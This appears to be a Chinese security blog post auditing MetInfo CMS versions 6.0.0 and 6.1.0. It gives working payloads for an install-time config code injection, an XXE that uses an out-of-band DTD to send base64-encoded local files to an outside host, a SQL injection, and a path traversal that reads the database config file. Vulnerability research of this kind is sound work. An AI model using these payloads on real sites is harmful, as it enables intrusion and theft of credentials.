MetInfo最新版代码审计漏洞合集

本是古典何须时尚 2022-12-31 14:24 265阅读 0赞

最近想给 X 天贡献点插件，时常会去留意 seebug 的最新漏洞列表，发现最近 MetInfo 的漏洞上座率蛮高的，就挑它来代码审计了一波。

seebug 上均是 `MetInfo 6.0.0` 版本的，官方已更新至 `6.1.0` 上述问题是否修复了呢？

## 入口文件 ##

这个框架的入口文件很多，都是index.php,比如online/index.php文件:

<?php
    define('M_NAME', 'online');
    define('M_MODULE', 'web');
    define('M_CLASS', 'online');
    define('M_ACTION', 'do_online');
    require_once '../app/system/entrance.php';

定义了四个常量，用于框架载入时区分入口来源、所属模块、调用类及方法，最后载入entrance.php调用里面的静态方法load::module(); 加载所需模块。

通过查找index.php入口文件，找到可以达到前台大多数方法的文件: /member/index.php。

<?php
    $M_MODULE='web';
    if(@$_GET['m']) $M_MODULE=$_GET['m'];
    if(@!$_GET['n']) $_GET['n'] = "user";
    if(@!$_GET['c']) $_GET['c'] = "profile";
    if(@!$_GET['a']) $_get['a'] = "doindex";
    @define('M_NAME', $_GET['n']);
    @define('M_MODULE', $M_MODULE);
    @define('M_CLASS', $_GET['c']);
    @define('M_ACTION', $_GET['a']);
    require_once '../app/system/entrance.php';

可以看到，通过控制$\_GET我们可以到达大多数方法。为什么是大多数呢？因为无法直接控制\_load\_class加载系统类。

里面的$action必须要do开头，也就是调用的方法名必须要do开头。

![图片][d28c0a8076a26b5ef60a9a6a4a269479.png]

## 低版本信息泄漏 ##

在安装之前，我首先对比了一下两个版本的修改文件记录，发现上一个版本的install文件夹中存在一个phpinfo.php文件，里面就是一段<?php phpinfo(); ?> 代码(6.1.0版本中已删除)。

这就方便我们获取目标网站的绝对路径，后期不管是写shell还是存在文件读取的情况，可以快速定位及利用。

![图片][55ee52e52f59fd9c1beb8967e1877e36.png]

网上找到的实例：

![图片][bd5959eb256d78117a4b57fb7220d2c8.png]

## 安装时写getshell ##

前提条件：

> 想利用此处首先需要删除config/install.lock安装锁文件。

在安装过程中执行到db\_setup(3.数据库设置)步骤时，发现存在配置文件任意更改的情况。

最近在看<php配置文件写入问题>

> https://github.com/CHYbeta/Code-Audit-Challenges/blob/master/php/challenge-3.md)

一直想找机会将它写一篇文章刚好这个 CMS 给了我机会。

![图片][fe5df7eca5971ef7559ee9d440e37124.png]

关键函数fputs()它是fwrite()函数的别名，用于文件写入。而且这里的逻辑也存在问题，应该将对文件的操作放在数据库连接判断后面。

当我们提交payload后:

setup=1&db_type=mysql&db_prefix=met_met"*/phpinfo();/*
    &db_host=localhost&db_name=met&db_username=root&db_pass=
    &cndata=yes&endata=yes&showdata=yes&submit=保存数据库设置并继续

虽然页面提示:数据库连接数据库失败，但config/config\_db.php文件内容已经被改变了。

参数受到64行代码影响，'\_\_COOKIE', '\_POST', '\_GET'传递都会加上addslashes()函数，所以单/双引号会在前面加个反斜杠。

<?php
        /*
        con_db_host = "localhost"
        con_db_port = "3306"
        con_db_id = "root"
        con_db_pass = ""
        con_db_name = "met"
        tablepre = "met_met\"*/phpinfo();/*"
        db_charset = "utf8";
        */
    ?>

我们访问下看下:

![图片][35f4b63ea5af52dd2a069aa194ee66a6.png]

实际上就是用\*/去闭合最外层的/\*,多行注释的优先级是很高的。

## XXE漏洞 ##

漏洞发生在此处文件: app/system/pay/web/pay.class.php,未禁外部实体加载:

![图片][8e4968318e7841bc661112c5e08384b1.png]

测试下是否存在外部引用:

![图片][f7450652acdf92f9a5cf4b20852124f3.png]

使用XXEinjector工具来验证漏洞，读取本地文件:

# x @ xdeMacBook-Pro in ~/work/tools/HackTools/xxe/XXEinjector on git:master x [19:42:19] C:1
    $ cat /etc/networks
    ##
    # Networks Database
    ##
    loopback127loopback-net
    
    # x @ xdeMacBook-Pro in ~/work/tools/HackTools/xxe/XXEinjector on git:master x [19:42:29]
    $ cat phprequest.txt
    POST /member/index.php?a=donotify&m=web&c=pay&n=pay HTTP/1.1
    Host:cms777.com
    User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0
    Accept:application/json, text/javascript, */*; q=0.01
    Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding:gzip, deflate
    Content-Type:text/xml
    Referer:http://cms777.com/\;
    X-Requested-With:XMLHttpRequest
    DNT:1
    Connection:close
    Pragma:no-cache
    Cache-Control:no-cache
    Content-Length:129
    
    XXEINJECT
    <data>4</data>
    
    # x @ xdeMacBook-Pro in ~/work/tools/HackTools/xxe/XXEinjector on git:master x [19:42:34]
    $ sudo ./XXEinjector.rb --host=192.168.31.21 --file=/Users/x/work/tools/HackTools/xxe/XXEinjector/phprequest.txt --path=/etc/networks --verbose --httpport=89 --oob=http --phpfilter
    XXEinjector by Jakub Pałaczyński
    
    Enumeration options:
    "y" - enumerate currect file (default)
    "n" - skip currect file
    "a" - enumerate all files in currect directory
    "s" - skip all files in currect directory
    "q" - quit
    
    [+]Sending request with malicious XML:
    http://cms777.com:80/member/index.php?a=donotify&m=web&c=pay&n=pay
    {"User-Agent"=>"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0", "Accept"=>"application/json, text/javascript, */*; q=0.01", "Accept-Language"=>"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding"=>"gzip, deflate", "Content-Type"=>"text/xml", "Referer"=>"http://cms777.com/\\;", "X-Requested-With"=>"XMLHttpRequest", "DNT"=>"1", "Connection"=>"close", "Pragma"=>"no-cache", "Cache-Control"=>"no-cache", "Content-Length"=>"118"}
    
    <!DOCTYPE convert [ <!ENTITY % remote SYSTEM "http://192.168.31.21:89/file.dtd">%remote;%int;%trick;]>
    <data>4</data>
    
    [+]Got request for XML:
    GET /file.dtd HTTP/1.0
    
    [+]Responding with XML for:/etc/networks
    [+]XML payload sent:
    <!ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/networks">
    <!ENTITY % int "<!ENTITY % trick SYSTEM 'http://192.168.31.21:89/?p=%payl;'>">
    
    [+]Response with file/directory content received:
    GET /?p=IyMKIyBOZXR3b3JrcyBEYXRhYmFzZQojIwpsb29wYmFjawkxMjcJCWxvb3BiYWNrLW5ldAo=HTTP/1.0
    
    [+]Retrieved data:
    [+]Nothing else to do. Exiting.

`IyMKIyBOZXR3b3JrcyBEYXRhYmFzZQojIwpsb29wYmFjawkxMjcJCWxvb3BiYWNrLW5ldAo=` 的内容正好是 `/etc/networks` 文件内的内容。

对比 `6.1.0` 版本，此处未被修复，XXE 存在。

![图片][9e4b99c341303756504b2ad26611a7b1.png]

**此处还存在一个 `鸡助的SQL注入`**

当传递 XML 内容：

会进入GetOrder()方法:

if ($array && $array['out_trade_no']) {
        $date = $this->GetOrder($array['out_trade_no']);
        %this->doNotify_wxpay($date);
    }

方法内部，$out\_trade\_no变量直接拼接进了sql语句中:

public function GetOrder($out_trade_no) {
        global $_M;
        if ($out_trade_no) {
            $query = "SELECT * FROM {$_M['table']['pay_order']} WHERE out_trade_no='{$out_trade_no}' ";
            $array = DB::get_one($query);
            return $array;
        } else {
            return FALSE;
        }
    }

但是，利用的前提要满足$\_M\['table'\]\['pay\_order'\]表存在，不然无法造成攻击:

![图片][16f3c318fc691231516095aca88ad88a.png]

**然后，亲切问候一下：您忙，我吃柠檬，您开心就好！～**

![图片][945375e9dd41d73715ce2353e52cb8b0.png]

## 任意文件读取 ##

我们全局正则搜索下 \\$\_GET|\\$\_POST,发现一处可疑的地方接收$\_GET\['dir'\]。

![图片][227436c5ec9ad72398362037b06dd61d.png]

从图中的代码中可以看到，接收外部参数后，将文件读入缓存中后再用flush()函数刷新输出缓冲至浏览器。

但目录地址不能直接使用，需要进入if函数中去，而$dir变量中的字符串前4位必须要有http。

我赌一块钱，当初写这段代码的程序员是想加外链图片的显示。

当然我们传入./.../后，经过str\_replace函数替换后会得到一个.,而单独的/是不会被过滤的，如此反复即可构造出突破限制的路径。

最终的payload:

/member/index.php?a=doshow&m=include&c=old_thumb&dir=http/./.../..././/./.../..././/config/config_db.php

![图片][b29e6230ca895d7ec638f444a4e9d554.png]

[d28c0a8076a26b5ef60a9a6a4a269479.png]: /images/20221120/c5dcb16a0a2d48eca12875d5ed3af721.png
[55ee52e52f59fd9c1beb8967e1877e36.png]: /images/20221120/c3a634419268473b8e60932dd425f8d8.png
[bd5959eb256d78117a4b57fb7220d2c8.png]: /images/20221120/3254f287f1254608a65eb26a3f0827e5.png
[fe5df7eca5971ef7559ee9d440e37124.png]: https://img-blog.csdnimg.cn/img_convert/fe5df7eca5971ef7559ee9d440e37124.png
[35f4b63ea5af52dd2a069aa194ee66a6.png]: https://img-blog.csdnimg.cn/img_convert/35f4b63ea5af52dd2a069aa194ee66a6.png
[8e4968318e7841bc661112c5e08384b1.png]: https://img-blog.csdnimg.cn/img_convert/8e4968318e7841bc661112c5e08384b1.png
[f7450652acdf92f9a5cf4b20852124f3.png]: https://img-blog.csdnimg.cn/img_convert/f7450652acdf92f9a5cf4b20852124f3.png
[9e4b99c341303756504b2ad26611a7b1.png]: https://img-blog.csdnimg.cn/img_convert/9e4b99c341303756504b2ad26611a7b1.png
[16f3c318fc691231516095aca88ad88a.png]: https://img-blog.csdnimg.cn/img_convert/16f3c318fc691231516095aca88ad88a.png
[945375e9dd41d73715ce2353e52cb8b0.png]: https://img-blog.csdnimg.cn/img_convert/945375e9dd41d73715ce2353e52cb8b0.png
[227436c5ec9ad72398362037b06dd61d.png]: https://img-blog.csdnimg.cn/img_convert/227436c5ec9ad72398362037b06dd61d.png
[b29e6230ca895d7ec638f444a4e9d554.png]: https://img-blog.csdnimg.cn/img_convert/b29e6230ca895d7ec638f444a4e9d554.png